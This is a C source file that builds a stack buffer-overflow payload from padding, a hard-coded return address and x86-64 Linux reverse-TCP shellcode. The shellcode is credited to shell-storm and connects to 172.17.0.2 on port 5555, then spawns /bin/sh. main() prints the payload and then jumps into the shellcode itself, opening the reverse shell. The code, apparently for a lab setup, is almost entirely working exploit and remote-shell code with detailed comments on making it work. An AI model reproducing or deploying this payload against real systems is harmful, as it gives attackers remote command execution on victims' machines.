#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// From: http://shell-storm.org/shellcode/files/shellcode-857.php
// For repeatability, always use the same length overflow
// Payload layout built by asPayload(): PAD_LEN bytes of 'a', then RET_ADDRESS as
// 8 little-endian bytes, then the shellcode, then 'b' filler out to
// BASE256_SIZE(OVERFLOW_LEN) bytes (plus a trailing NUL that is also emitted).
#define PAD_LEN 17 /* 'a' bytes placed before the overwritten return address */
// Evaluates to 0x7fffffffe630: a hard-coded stack address, so this only works with
// ASLR disabled and for the one target/stack layout it was measured against
// (NOTE(review): the +8+64-0xf0 adjustment is undocumented — confirm against the target).
// Its two high bytes are 0x00, so the payload unavoidably contains NUL bytes.
#define RET_ADDRESS (0x7fffffffe6d8+8+64-0xf0)
#define OVERFLOW_LEN 500 /* nominal overflow length; BASE256_SIZE() treats it as a base64 char count */
#define BASE64_SIZE(s) (((s)/3+1)*4) /* base64 chars needed for s raw bytes; unused in this file */
#define BASE256_SIZE(s) (((s)/4-1)*3) /* raw bytes that fit in s base64 chars: 372 for OVERFLOW_LEN */
#define IPADDR "\xac\x11\x00\x02" /* 172.17.0.2, network byte order; contains a 0x00 byte */
#define PORT "\x15\xb3" /* 5555, network byte order */
// x86-64 Linux reverse-TCP shellcode, 118 bytes. Reading the bytes: syscall 41 (socket)
// with AF_INET/SOCK_STREAM/IPPROTO_TCP, a sockaddr_in assembled on the stack from PORT
// and IPADDR, syscall 42 (connect), a dup2 (syscall 33) loop over fds 2,1,0, then
// syscall 59 (execve) of "/bin/sh" (the "//bin/sh" immediate shifted right by 8).
// Caveats: (1) the string literal adds a terminating NUL, but byte 57 (the 0x00 inside
// IPADDR) comes first, so strlen()/"%s" see only the first 57 bytes — asPayload()
// relies on strlen and therefore emits a truncated copy; the true length is
// sizeof(reverse_shell)-1. (2) This is a writable, non-const global; main() jumps
// into it directly, which only works if that memory is executable.
unsigned char reverse_shell[] = \
"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x4d\x31\xc0\x6a"
"\x02\x5f\x6a\x01\x5e\x6a\x06\x5a\x6a\x29\x58\x0f\x05\x49\x89\xc0"
"\x48\x31\xf6\x4d\x31\xd2\x41\x52\xc6\x04\x24\x02\x66\xc7\x44\x24"
"\x02"PORT"\xc7\x44\x24\x04"IPADDR"\x48\x89\xe6\x6a\x10"
"\x5a\x41\x50\x5f\x6a\x2a\x58\x0f\x05\x48\x31\xf6\x6a\x03\x5e\x48"
"\xff\xce\x6a\x21\x58\x0f\x05\x75\xf6\x48\x31\xff\x57\x57\x5e\x5a"
"\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54"
"\x5f\x6a\x3b\x58\x0f\x05";
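/*
 * Build the raw overflow payload:
 *   PAD_LEN bytes of 'a' | RET_ADDRESS (8 bytes, little-endian) | shellcode | 'b' filler
 * sized to exactly BASE256_SIZE(OVERFLOW_LEN) bytes, followed by one trailing NUL that
 * is part of the returned buffer (BASE256_SIZE(OVERFLOW_LEN)+1 bytes in total).
 *
 * The shellcode length is passed explicitly because reverse_shell contains a 0x00
 * byte (inside IPADDR): the previous strlen()/sprintf("%s") approach silently cut the
 * shellcode at byte 57 and replaced the rest with 'b' filler.
 *
 * @param s    shellcode bytes; may contain 0x00.
 * @param len  number of bytes of s to copy.
 * @return heap buffer owned by the caller (free() it), or NULL if malloc() fails or
 *         pad + address + shellcode do not fit in BASE256_SIZE(OVERFLOW_LEN) bytes
 *         (the old sprintf() chain would have written past the buffer here).
 */
static unsigned char *asPayloadN(const unsigned char *s, size_t len)
{
    const size_t body = (size_t) BASE256_SIZE(OVERFLOW_LEN);
    const size_t hdr = PAD_LEN + sizeof(unsigned long);

    if (hdr > body || len > body - hdr)
        return NULL;

    unsigned char *pl = malloc(body + 1);
    if (pl == NULL)
        return NULL;

    unsigned char *p = pl;
    memset(p, 'a', PAD_LEN);
    p += PAD_LEN;

    /* Emit the address least-significant byte first (x86-64 is little-endian).
       The high bytes of RET_ADDRESS are 0x00 and are written as raw bytes. */
    unsigned long r = (unsigned long) RET_ADDRESS;
    for (size_t i = 0; i < sizeof r; i++, r >>= 8)
        *p++ = (unsigned char) (r & 0xFF);

    memcpy(p, s, len);
    p += len;

    /* Filler up to the fixed overflow size, then the terminator. */
    memset(p, 'b', body - (size_t) (p - pl));
    pl[body] = '\0';
    return pl;
}

/*
 * Original entry point, kept for callers that pass a NUL-free C string.
 * strlen() stops at the first 0x00, so this cannot carry reverse_shell intact;
 * use asPayloadN(s, sizeof s - 1) for shellcode that embeds NUL bytes.
 *
 * @param s  NUL-terminated shellcode.
 * @return   see asPayloadN().
 */
static unsigned char *asPayload(unsigned char *s)
{
    return asPayloadN(s, strlen((char *) s));
}

int main(void)
{
    /* sizeof - 1 drops the literal's terminator but keeps the 0x00 inside IPADDR. */
    unsigned char *sPayload = asPayloadN(reverse_shell, sizeof reverse_shell - 1);
    if (sPayload == NULL) {
        fputs("payload does not fit\n", stderr);
        return 1;
    }
    /* Write all BASE256_SIZE(OVERFLOW_LEN)+1 bytes, NULs included, as before. */
    fwrite(sPayload, 1, (size_t) BASE256_SIZE(OVERFLOW_LEN) + 1, stdout);
    fflush(stdout);
    free(sPayload);
    /* Local self-test: jump into the shellcode in-process, which opens a reverse
       shell to IPADDR:PORT from this process. It only works if the array's memory
       is executable (NX disabled for the binary, e.g. an execstack link); on a
       default hardened build it faults — NOTE(review): confirm the build flags. */
    ((void(*)(void))reverse_shell)();
    return 0;
}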